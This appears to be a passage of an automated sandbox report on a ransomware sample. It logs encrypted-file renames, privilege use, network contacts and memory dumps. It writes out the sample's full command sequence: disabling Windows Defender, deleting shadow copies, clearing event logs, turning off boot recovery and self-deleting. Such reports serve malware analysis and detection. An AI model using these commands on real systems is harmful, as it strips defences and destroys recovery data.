| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\2653_20x20x32.png | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\A12_Spinner_int_2x.gif.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_4AY-Bf2BbW40.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\new_icons.png.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_89vc6G0I_Ak0.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogoSmall.contrast-black_scale-80.png.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_1mLJF-BP-z80.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\Send2.16.GrayF@2x.png.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_OnzH7VrFjMw0.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Car\LTR\contrast-black\MedTile.scale-200.png | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\System\Ole DB\de-DE\oledb32r.dll.mui.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_T1x81R8qVuw0.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\_Resources\1.rsrc | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-32_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\pl-pl\ui-strings.js.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_dRrLmyzYvnY0.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProjectProR_Grace-ul-oob.xrm-ms.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_3N9y7QZJV2U0.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Beach\mask\12h.png | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNotePageSmallTile.scale-200.png | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\Images\LayersControl\Road.png | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\System\msadc\fr-FR\msadcor.dll.mui | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-windows_ja.jar.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_s3nX6rd4P2c0.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.targetsize-16_altform-unplated.png | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\models\en-GB.mail.config | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\ms_get.svg.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_Pgf5JfxbUZ40.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\notepad.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe
"C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe"
C:\Windows\SYSTEM32\net.exe
net.exe stop "SamSs" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "vmicvss" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "vmicvss" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "VSS" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "wbengine" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "WebClient" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "UnistoreSvc_12a5d" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UnistoreSvc_12a5d" /y
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "vmicvss" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "UnistoreSvc_12a5d" start= disabled
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl system
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl security
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl application
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\System32\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\SYSTEM32\notepad.exe
notepad.exe C:\4a7Z_HOW_TO_DECRYPT.txt
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe"
C:\Windows\system32\PING.EXE
ping.exe -n 5 127.0.0.1
Network
| Country | Destination | Domain | Proto |
| US | 52.109.8.19:443 | tcp | |
| US | 8.8.8.8:53 | time.windows.com | udp |
| NL | 40.119.148.38:123 | time.windows.com | udp |
| DE | 23.51.123.27:80 | tcp |
Files
memory/2312-115-0x0000000000000000-mapping.dmp
memory/924-116-0x0000000000000000-mapping.dmp
memory/504-117-0x0000000000000000-mapping.dmp
memory/2080-118-0x0000000000000000-mapping.dmp
memory/4064-119-0x0000000000000000-mapping.dmp
memory/4020-120-0x0000000000000000-mapping.dmp
memory/1020-121-0x0000000000000000-mapping.dmp
memory/776-122-0x0000000000000000-mapping.dmp
memory/1864-123-0x0000000000000000-mapping.dmp
memory/2380-124-0x0000000000000000-mapping.dmp
memory/2840-125-0x0000000000000000-mapping.dmp
memory/608-126-0x0000000000000000-mapping.dmp
memory/1200-127-0x0000000000000000-mapping.dmp
memory/2716-128-0x0000000000000000-mapping.dmp
memory/688-129-0x0000000000000000-mapping.dmp
memory/1580-130-0x0000000000000000-mapping.dmp
memory/916-131-0x0000000000000000-mapping.dmp
memory/2440-132-0x0000000000000000-mapping.dmp
memory/1428-133-0x0000000000000000-mapping.dmp
memory/1452-134-0x0000000000000000-mapping.dmp
memory/1584-135-0x0000000000000000-mapping.dmp
memory/2120-136-0x0000000000000000-mapping.dmp
memory/3180-137-0x0000000000000000-mapping.dmp
memory/3272-138-0x0000000000000000-mapping.dmp
memory/2868-139-0x0000000000000000-mapping.dmp
memory/3292-140-0x0000000000000000-mapping.dmp
memory/1836-141-0x0000000000000000-mapping.dmp
memory/320-142-0x0000000000000000-mapping.dmp
memory/3480-143-0x0000000000000000-mapping.dmp
memory/3188-144-0x0000000000000000-mapping.dmp
memory/3212-145-0x0000000000000000-mapping.dmp
memory/3776-146-0x0000000000000000-mapping.dmp
memory/1988-147-0x0000000000000000-mapping.dmp
memory/1440-148-0x0000000000000000-mapping.dmp
memory/820-149-0x0000000000000000-mapping.dmp
memory/1992-150-0x0000000000000000-mapping.dmp
memory/4040-151-0x0000000000000000-mapping.dmp
memory/4044-152-0x0000000000000000-mapping.dmp
memory/3216-153-0x0000000000000000-mapping.dmp
memory/2740-154-0x0000000000000000-mapping.dmp
memory/8-155-0x0000000000000000-mapping.dmp
memory/2616-156-0x0000000000000000-mapping.dmp
memory/2680-157-0x0000000000000000-mapping.dmp
memory/3672-158-0x0000000000000000-mapping.dmp
memory/1272-159-0x0000000000000000-mapping.dmp
memory/1056-160-0x0000000000000000-mapping.dmp
memory/2328-161-0x0000000000000000-mapping.dmp
memory/1920-162-0x0000000000000000-mapping.dmp
memory/772-163-0x0000000000000000-mapping.dmp
memory/2304-164-0x0000000000000000-mapping.dmp
memory/2956-165-0x0000000000000000-mapping.dmp
memory/3396-166-0x0000000000000000-mapping.dmp
memory/1672-167-0x0000000000000000-mapping.dmp
memory/2784-168-0x0000000000000000-mapping.dmp
memory/3624-169-0x0000000000000000-mapping.dmp
memory/3792-170-0x0000000000000000-mapping.dmp
memory/2196-171-0x0000000000000000-mapping.dmp
memory/3872-172-0x0000000000000000-mapping.dmp
memory/1868-173-0x0000000000000000-mapping.dmp
memory/648-174-0x0000000000000000-mapping.dmp
memory/1160-175-0x0000000000000000-mapping.dmp
memory/2800-176-0x0000000000000000-mapping.dmp
memory/2212-177-0x0000000000000000-mapping.dmp
memory/736-178-0x0000000000000000-mapping.dmp
memory/3652-180-0x0000017C294A0000-0x0000017C294A2000-memory.dmp
memory/3652-179-0x0000017C294A0000-0x0000017C294A2000-memory.dmp
memory/3652-181-0x0000017C294A0000-0x0000017C294A2000-memory.dmp
memory/3652-182-0x0000017C294A0000-0x0000017C294A2000-memory.dmp
memory/3652-183-0x0000017C294A0000-0x0000017C294A2000-memory.dmp
memory/3652-184-0x0000017C2AE40000-0x0000017C2AE62000-memory.dmp
memory/3652-185-0x0000017C294A0000-0x0000017C294A2000-memory.dmp
memory/3652-186-0x0000017C294A0000-0x0000017C294A2000-memory.dmp
memory/3652-187-0x0000017C43E10000-0x0000017C43E86000-memory.dmp
memory/3652-188-0x0000017C294A0000-0x0000017C294A2000-memory.dmp
memory/3652-190-0x0000017C433F0000-0x0000017C433F2000-memory.dmp
memory/3652-192-0x0000017C433F3000-0x0000017C433F5000-memory.dmp
memory/3652-194-0x0000017C294A0000-0x0000017C294A2000-memory.dmp
memory/3652-195-0x0000017C433F6000-0x0000017C433F8000-memory.dmp
memory/3652-196-0x0000017C294A0000-0x0000017C294A2000-memory.dmp
memory/3652-216-0x0000017C294A0000-0x0000017C294A2000-memory.dmp
memory/1112-218-0x0000020CB4C30000-0x0000020CB4C32000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | ad5cd538ca58cb28ede39c108acb5785 |
| SHA1 | 1ae910026f3dbe90ed025e9e96ead2b5399be877 |
| SHA256 | c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033 |
| SHA512 | c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13 |
memory/1112-219-0x0000020CB4C30000-0x0000020CB4C32000-memory.dmp
memory/1112-220-0x0000020CB4C30000-0x0000020CB4C32000-memory.dmp
memory/1112-221-0x0000020CB4C30000-0x0000020CB4C32000-memory.dmp
memory/1112-223-0x0000020CCDC10000-0x0000020CCDC32000-memory.dmp
memory/1112-222-0x0000020CB4C30000-0x0000020CB4C32000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 3f0468cb81c9d485aeeece028d74f25b |
| SHA1 | dcd40e2d4f657298ba2449dbd22f19db457830eb |
